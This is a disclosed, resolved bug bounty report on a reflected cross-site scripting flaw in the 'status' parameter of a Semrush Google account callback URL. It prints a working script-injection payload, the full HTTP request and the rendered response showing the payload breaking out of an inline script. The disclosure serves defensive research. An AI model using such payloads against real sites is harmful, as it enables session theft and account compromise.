Reflected XSS on https://www.semrush.com/my_reports/externalSource/callback/googleAccountsGMB
Team Summary
Official summary from Semrush
Researcher found reflected XSS vulnerability on https://www.semrush.com/my_reports/externalSource/callback/googleAccountsGMB **Report:** The parameter status is missing sanitization in the following url: >https://www.semrush.com/my_reports/externalSource/callback/googleAccountsGMB?status=</xss>xss<script>alert()// Request: >GET /my_reports/externalSource/callback/googleAccountsGMB?status=</xss>xss<script>alert()// HTTP/1.1 Host: www.semrush.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache code rendered ><main class="srf-layout__body" id="root-content"> <script>window.opener.connectExternalSourceCallback({"status":"</xss>xss<script>alert()//","source":"googleAccountsGMB"});</script> </main>
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected